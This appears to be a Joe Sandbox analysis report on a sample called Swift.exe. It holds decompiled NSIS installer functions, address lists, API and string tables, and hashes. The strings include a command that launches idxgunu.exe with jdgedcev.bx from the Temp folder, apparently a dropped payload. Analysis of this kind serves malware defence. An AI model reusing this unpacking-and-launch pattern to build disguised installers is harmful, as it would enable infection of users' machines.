						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x79ed68 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a2780, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t79 = 0x7a1720;
					E00405A6C( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x7a27b8, 0x7a1720, 0);
					_t62 =  *0x7a1720; // 0x22
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x7a1721;
						 *((char*)(E004056A3(0x7a1721, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405B85(_t84, E00405678(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E004056BF(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x004035de
0x004035e7
0x004035ee
0x004035f0
0x00403604
0x00403616
0x00403620
0x00403625
0x0040362b
0x0040363e
0x0040363e
0x00403649
0x004035f2
0x004035fd
0x004035fd
0x0040364e
0x00403658
0x00403661
0x00403666
0x00403677
0x004036fe
0x00403706
0x0040370f
0x0040370f
0x00403725
0x0040372b
0x00403739
0x004037c8
0x004037d0
0x004037da
0x004037df
0x004037e5
0x0040386f
0x00403874
0x00403876
0x00403892
0x00000000
0x00403892
0x00403878
0x0040387e
0x00403886
0x00403886
0x00000000
0x0040387e
0x004037f3
0x004037fe
0x00403803
0x00403805
0x0040380c
0x0040380c
0x00403817
0x0040381f
0x00403821
0x00403823
0x0040382c
0x0040382f
0x00403835
0x00403835
0x0040383b
0x00403854
0x00403865
0x00000000
0x0040386a
0x004037d2
0x004037d4
0x00000000
0x0040373f
0x0040373f
0x00403745
0x0040374f
0x00403757
0x00403761
0x00403767
0x00403775
0x00403897
0x00403897
0x00000000
0x00403897
0x0040377b
0x00403784
0x004037c3
0x00000000
0x004037c3
0x0040367d
0x0040367d
0x00403682
0x00000000
0x00000000
0x0040368c
0x0040369c
0x004036a1
0x004036a8
0x00000000
0x00000000
0x004036ac
0x004036ae
0x004036bb
0x004036bb
0x004036c3
0x004036c9
0x004036f1
0x004036f9
0x00000000
0x004036db
0x004036dc
0x004036e5
0x004036eb
0x004036ec
0x00000000
0x004036ec
0x004036e7
0x004036e9
0x00000000
0x00000000
0x00000000
0x004036e9
0x004036c9

APIs

Part of subcall function 00405F11: GetModuleHandleA.KERNEL32(?,?,00000000,0040315D,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00405F23
Part of subcall function 00405F11: GetProcAddress.KERNEL32(00000000,?), ref: 00405F3E

lstrcatA.KERNEL32(1033,0079ED90,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079ED90,00000000,00000003,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Swift.exe",00000000), ref: 00403649
lstrlenA.KERNEL32("C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx,?,?,?,"C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx,00000000,C:\Users\user\AppData\Local\Temp,1033,0079ED90,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079ED90,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 004036BE
lstrcmpiA.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx,?,?,?,"C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx,00000000,C:\Users\user\AppData\Local\Temp,1033,0079ED90,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079ED90,00000000), ref: 004036D1
GetFileAttributesA.KERNEL32("C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx), ref: 004036DC
LoadImageA.USER32 ref: 00403725

Part of subcall function 00405AE3: wsprintfA.USER32 ref: 00405AF0

RegisterClassA.USER32 ref: 0040376C
SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403784
CreateWindowExA.USER32 ref: 004037BD
ShowWindow.USER32(00000005,00000000), ref: 004037F3
GetClassInfoA.USER32 ref: 0040381F
GetClassInfoA.USER32 ref: 0040382C
RegisterClassA.USER32 ref: 00403835
DialogBoxParamA.USER32 ref: 00403854

Strings

RichEd20, xrefs: 004037F9
"C:\Users\user\Desktop\Swift.exe", xrefs: 004035DC
C:\Users\user\AppData\Local\Temp\, xrefs: 004035E4
.DEFAULT\Control Panel\International, xrefs: 00403634
RichEdit20A, xrefs: 00403817, 0040381D
Control Panel\Desktop\ResourceLocale, xrefs: 0040360C
1033, xrefs: 004035F8, 00403644
.exe, xrefs: 004036CB
C:\Users\user\AppData\Local\Temp, xrefs: 00403658, 00403660, 004036F8, 004036FE, 0040370E
RichEdit, xrefs: 00403826
"C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx, xrefs: 0040368C, 00403694, 004036A1, 004036EB, 004036F1
_Nb, xrefs: 0040377B, 00403780
RichEd32, xrefs: 00403807

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx$"C:\Users\user\Desktop\Swift.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 1975747703-2306931690
Opcode ID: 3b0a2c34d636645f9fe3374a27c474c10c7373090ca0867c7b1b6124343d223d
Instruction ID: afb321b498fdf636d93411754839b6ec108bdb238310dcba8b078dd53a689049
Opcode Fuzzy Hash: 3b0a2c34d636645f9fe3374a27c474c10c7373090ca0867c7b1b6124343d223d
Instruction Fuzzy Hash: 3B61C7B16042007EE720AF659C85E3B3AACEB85749F04457FF541B22E2DB7D69418B2E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C38 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E00402C38(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				long _t50;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				long _t70;
				void* _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				long _t90;
				long _t93;
				intOrPtr* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\jones\\Desktop\\Swift.exe";
				 *0x7a278c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\Swift.exe", 0x400);
				_t89 = E0040585C(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409014 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\jones\\Desktop";
				E00405B85("C:\\Users\\jones\\Desktop", _t91);
				E00405B85(0x7aa000, E004056BF(_t92));
				_t50 = GetFileSize(_t89, 0);
				 *0x79d940 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BD4(1);
					if( *0x7a2794 == _t82) {
						goto L29;
					}
					if(_v8 == _t82) {
						L28:
						_t94 = GlobalAlloc(0x40, _v24);
						E004030A9( *0x7a2794 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402E71(); // executed
						if(_t57 == _v24) {
							 *0x7a2790 = _t94;
							 *0x7a2798 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x7a279c =  *0x7a279c + 1;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E0040581D(0x7a27a0, _t94 + 4, 0x40);
							return 0;
						}
						goto L29;
					}
					E004030A9( *0x789934);
					if(E00403077( &_a4, 4) == 0 || _v12 != _a4) {
						goto L29;
					} else {
						goto L28;
					}
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x7a2794) & 0x00007e00) + 0x200;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403077(0x795940, _t90); // executed
						if(_t71 == 0) {
							E00402BD4(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x7a2794 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402BD4(0);
							}
							goto L20;
						}
						E0040581D( &_v44, 0x795940, 0x1c);
						_t77 = _v44;
						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
							_a4 = _a4 | _t77;
							_t87 =  *0x789934; // 0x8400
							 *0x7a2820 =  *0x7a2820 | _a4 & 0x00000002;
							_t80 = _v20;
							 *0x7a2794 = _t87;
							if(_t80 > _t93) {
								goto L29;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v8 = _v8 + 1;
								_t93 = _t80 - 4;
								if(_t90 > _t93) {
									_t90 = _t93;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t93 <  *0x79d940) {
							_v12 = E00405F80(_v12, 0x795940, _t90);
						}
						 *0x789934 =  *0x789934 + _t90;
						_t93 = _t93 - _t90;
					} while (_t93 > 0);
					_t82 = 0;
					goto L24;
				}
			}

0x00402c40
0x00402c43
0x00402c46
0x00402c49
0x00402c4f
0x00402c60
0x00402c65
0x00402c78
0x00402c7d
0x00402c80
0x00402c86
0x00000000
0x00402c88
0x00402c93
0x00402c99
0x00402caa
0x00402cb1
0x00402cb9
0x00402cbe
0x00402cc0
0x00402dad
0x00402daf
0x00402dbb
0x00000000
0x00000000
0x00402dc0
0x00402de4
0x00402def
0x00402dfa
0x00402dff
0x00402e02
0x00402e03
0x00402e04
0x00402e06
0x00402e0e
0x00402e25
0x00402e2d
0x00402e32
0x00402e34
0x00402e34
0x00402e3c
0x00402e3c
0x00402e3f
0x00402e40
0x00402e40
0x00402e43
0x00402e45
0x00402e45
0x00402e4f
0x00402e55
0x00402e63
0x00000000
0x00402e68
0x00000000
0x00402e0e
0x00402dc8
0x00402dda
0x00000000
0x00000000
0x00000000
0x00000000
0x00402cc6
0x00402ccb
0x00402cd0
0x00402cd4
0x00402cdb
0x00402ce2
0x00402ce4
0x00402ce4
0x00402ce8
0x00402cef
0x00402e19
0x00402e10
0x00000000
0x00402e10
0x00402cfc
0x00402d7c
0x00402d80
0x00402d85
0x00000000
0x00402d7c
0x00402d05
0x00402d0a
0x00402d12
0x00402d38
0x00402d3e
0x00402d47
0x00402d4d
0x00402d52
0x00402d58
0x00000000
0x00000000
0x00402d62
0x00402d6a
0x00402d6d
0x00402d72
0x00402d74
0x00402d74
0x00000000
0x00000000
0x00000000
0x00000000
0x00402d62
0x00402d86
0x00402d8c
0x00402d98
0x00402d98
0x00402d9b
0x00402da1
0x00402da3
0x00402dab
0x00000000
0x00402dab

APIs

GetTickCount.KERNEL32 ref: 00402C49
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Swift.exe,00000400), ref: 00402C65

Part of subcall function 0040585C: GetFileAttributesA.KERNELBASE(00000003,00402C78,C:\Users\user\Desktop\Swift.exe,80000000,00000003), ref: 00405860
Part of subcall function 0040585C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405882

GetFileSize.KERNEL32(00000000,00000000,007AA000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Swift.exe,C:\Users\user\Desktop\Swift.exe,80000000,00000003), ref: 00402CB1

Strings

Inst, xrefs: 00402D1D
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E10
soft, xrefs: 00402D26
@Yy, xrefs: 00402CC6
"C:\Users\user\Desktop\Swift.exe", xrefs: 00402C38
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C42
C:\Users\user\Desktop\Swift.exe, xrefs: 00402C4F, 00402C5E, 00402C72, 00402C92
C:\Users\user\Desktop, xrefs: 00402C93, 00402C98, 00402C9E
Error launching installer, xrefs: 00402C88
Null, xrefs: 00402D2F

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Swift.exe"$@Yy$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Swift.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-4244134986
Opcode ID: 04d870f5bc90509aeaac701fc5ec0b624eb95127b8a1651113390c3fa494a0c7
Instruction ID: f69f116272036eca37f31b2830df7a910c582a27d764897ed305ff6fb543bfb5
Opcode Fuzzy Hash: 04d870f5bc90509aeaac701fc5ec0b624eb95127b8a1651113390c3fa494a0c7
Instruction Fuzzy Hash: 44510831901214ABDB109F64DE89B6E7BB8EF51324F20413BFA04B62D1D7BC9D418BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00402E71 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 171
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00402E71(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				struct _OVERLAPPED* _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t67;
				void* _t68;
				long _t74;
				intOrPtr _t78;
				long _t79;
				void* _t81;
				int _t83;
				void* _t98;
				void* _t99;
				long _t100;
				int _t101;
				long _t102;
				int _t103;
				intOrPtr _t104;
				long _t105;
				void* _t106;

				_t101 = _a16;
				_t98 = _a12;
				_v12 = _t101;
				if(_t98 == 0) {
					_v12 = 0x8000;
				}
				_v8 = 0;
				_v16 = _t98;
				if(_t98 == 0) {
					_v16 = 0x78d938;
				}
				_t65 = _a4;
				if(_a4 >= 0) {
					E004030A9( *0x7a27d8 + _t65);
				}
				_t67 = E00403077( &_a16, 4); // executed
				if(_t67 == 0) {
					L44:
					_push(0xfffffffd);
					goto L45;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t98 != 0) {
							if(_a16 < _t101) {
								_t101 = _a16;
							}
							if(E00403077(_t98, _t101) != 0) {
								_v8 = _t101;
								L47:
								return _v8;
							} else {
								goto L44;
							}
						}
						if(_a16 <= 0) {
							goto L47;
						}
						while(1) {
							_t102 = _v12;
							if(_a16 < _t102) {
								_t102 = _a16;
							}
							if(E00403077(0x789938, _t102) == 0) {
								goto L44;
							}
							if(WriteFile(_a8, 0x789938, _t102,  &_a12, 0) == 0 || _t102 != _a12) {
								L30:
								_push(0xfffffffe);
								L45:
								_pop(_t68);
								return _t68;
							} else {
								_v8 = _v8 + _t102;
								_a16 = _a16 - _t102;
								if(_a16 > 0) {
									continue;
								}
								goto L47;
							}
						}
						goto L44;
					}
					_t74 = GetTickCount();
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_v20 = _t74;
					 *0x40b080 = 0xb;
					 *0x40b098 = 0;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L47;
					}
					while(1) {
						L10:
						_t103 = 0x4000;
						if(_a16 < 0x4000) {
							_t103 = _a16;
						}
						if(E00403077(0x789938, _t103) == 0) {
							goto L44;
						}
						_a16 = _a16 - _t103;
						 *0x40b070 = 0x789938;
						 *0x40b074 = _t103;
						while(1) {
							_t99 = _v16;
							 *0x40b078 = _t99;
							 *0x40b07c = _v12;
							_t78 = E00405FEE(0x40b070);
							_v28 = _t78;
							if(_t78 < 0) {
								break;
							}
							_t104 =  *0x40b078; // 0x78f738
							_t105 = _t104 - _t99;
							_t79 = GetTickCount();
							_t100 = _t79;
							if(( *0x7a2834 & 0x00000001) != 0 && (_t79 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t106 = _t106 + 0xc;
								E00404E71(0,  &_v92);
								_v20 = _t100;
							}
							if(_t105 == 0) {
								if(_a16 > 0) {
									goto L10;
								}
								goto L47;
							} else {
								if(_a12 != 0) {
									_t81 =  *0x40b078; // 0x78f738
									_v8 = _v8 + _t105;
									_v12 = _v12 - _t105;
									_v16 = _t81;
									L25:
									if(_v28 != 4) {
										continue;
									}
									goto L47;
								}
								_t83 = WriteFile(_a8, _v16, _t105,  &_v24, 0); // executed
								if(_t83 == 0 || _v24 != _t105) {
									goto L30;
								} else {
									_v8 = _v8 + _t105;
									goto L25;
								}
							}
						}
						_push(0xfffffffc);
						goto L45;
					}
					goto L44;
				}
			}

0x00402e79
0x00402e7d
0x00402e84
0x00402e87
0x00402e89
0x00402e89
0x00402e92
0x00402e95
0x00402e98
0x00402e9a
0x00402e9a
0x00402ea1
0x00402ea6
0x00402eb1
0x00402eb1
0x00402ebc
0x00402ec3
0x00403065
0x00403065
0x00000000
0x00402ec9
0x00402ecd
0x00403008
0x00403055
0x00403057
0x00403057
0x00403063
0x0040306a
0x0040306d
0x00000000
0x00000000
0x00000000
0x00000000
0x00403063
0x0040300d
0x00000000
0x00000000
0x00403014
0x00403014
0x0040301a
0x0040301c
0x0040301c
0x00403028
0x00000000
0x00000000
0x0040303d
0x00403002
0x00403002
0x00403067
0x00403067
0x00000000
0x00403044
0x00403044
0x00403047
0x0040304e
0x00000000
0x00000000
0x00000000
0x00403050
0x0040303d
0x00000000
0x00403014
0x00402ed3
0x00402ed9
0x00402ed9
0x00402ee0
0x00402ee6
0x00402eed
0x00402ef3
0x00402ef6
0x00000000
0x00000000
0x00402f01
0x00402f01
0x00402f01
0x00402f09
0x00402f0b
0x00402f0b
0x00402f17
0x00000000
0x00000000
0x00402f1d
0x00402f20
0x00402f26
0x00402f2c
0x00402f2c
0x00402f37
0x00402f3d
0x00402f42
0x00402f49
0x00402f4c
0x00000000
0x00000000
0x00402f52
0x00402f58
0x00402f5a
0x00402f67
0x00402f69
0x00402f97
0x00402f9d
0x00402fa6
0x00402fab
0x00402fab
0x00402fb2
0x00402ff6
0x00000000
0x00000000
0x00000000
0x00402fb4
0x00402fb7
0x00402fd9
0x00402fde
0x00402fe1
0x00402fe4
0x00402fe7
0x00402feb
0x00000000
0x00000000
0x00000000
0x00402ff1
0x00402fc5
0x00402fcd
0x00000000
0x00402fd4
0x00402fd4
0x00000000
0x00402fd4
0x00402fcd
0x00402fb2
0x00402ffe
0x00000000
0x00402ffe
0x00000000
0x00402f01

APIs

GetTickCount.KERNEL32 ref: 00402ED3
GetTickCount.KERNEL32 ref: 00402F5A
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F87
wsprintfA.USER32 ref: 00402F97
WriteFile.KERNELBASE(00000000,00000000,0078F738,7FFFFFFF,00000000), ref: 00402FC5

Strings

... %d%%, xrefs: 00402F91

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: CountTick$FileWritewsprintf
String ID: ... %d%%
API String ID: 4209647438-2449383134
Opcode ID: 9f0557aad36de06df9892d4a711421ac9c6f1410972b3483a5be10f8d4cae8eb
Instruction ID: 5486976baabe65b39d10aa247c29dbb8266945012fd831dc3a60811568def4e9
Opcode Fuzzy Hash: 9f0557aad36de06df9892d4a711421ac9c6f1410972b3483a5be10f8d4cae8eb
Instruction Fuzzy Hash: 71518E7190121ADBCF10DF69DA48AAF7BB8EB04755F14413BF910B72C4D3789A40DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401734 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A0C(0x31);
				 *(_t85 - 0xc) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E004056E5(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405678(E00405B85(0x409c30, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c30);
					E00405B85();
				}
				E00405DE7(0x409c30);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405E80(0x409c30);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040583D(0x409c30);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040585C(0x409c30, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E71(0xffffffe2,  *(_t85 - 0xc));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x7a2808 =  *0x7a2808 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x7a2808;
						goto L32;
					} else {
						E00405B85(0x40a430, 0x7a3000);
						E00405B85(0x7a3000, 0x409c30);
						E00405BA7(_t75, 0x40a430, 0x409c30, 0x40a030,  *((intOrPtr*)(_t85 - 0x14)));
						E00405B85(0x7a3000, 0x40a430);
						_t62 = E00405446(0x40a030,  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x7a2808 =  &( *0x7a2808->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c30);
								_push(0xfffffffa);
								E00404E71();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E71(0xffffffea,  *(_t85 - 0xc));
				 *0x7a2834 =  *0x7a2834 + 1;
				_t43 = E00402E71( *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 8), _t75, _t75); // executed
				 *0x7a2834 =  *0x7a2834 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 8)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405BA7(_t75, _t80, 0x409c30, 0x409c30, 0xffffffee);
					} else {
						E00405BA7(_t75, _t80, 0x409c30, 0x409c30, 0xffffffe9);
						lstrcatA(0x409c30,  *(_t85 - 0xc));
					}
					_push(0x200010);
					_push(0x409c30);
					E00405446();
					goto L29;
				}
				goto L33;
			}

0x00401734
0x0040173b
0x00401744
0x00401747
0x0040174a
0x0040174f
0x00401757
0x00401773
0x00401759
0x00401759
0x0040175a
0x0040175a
0x00401779
0x00401783
0x00401783
0x00401787
0x0040178a
0x0040178f
0x00401791
0x00401793
0x00401798
0x00401798
0x004017a3
0x004017a3
0x004017b4
0x004017b6
0x004017b6
0x004017b7
0x004017b7
0x004017ba
0x004017bd
0x004017c0
0x004017c0
0x004017c7
0x004017d6
0x004017db
0x004017de
0x004017e1
0x00000000
0x00000000
0x004017e3
0x004017e6
0x00401840
0x00401845
0x004015a8
0x00402672
0x00402672
0x004028a1
0x004028a4
0x004028a4
0x00000000
0x004017e8
0x004017ee
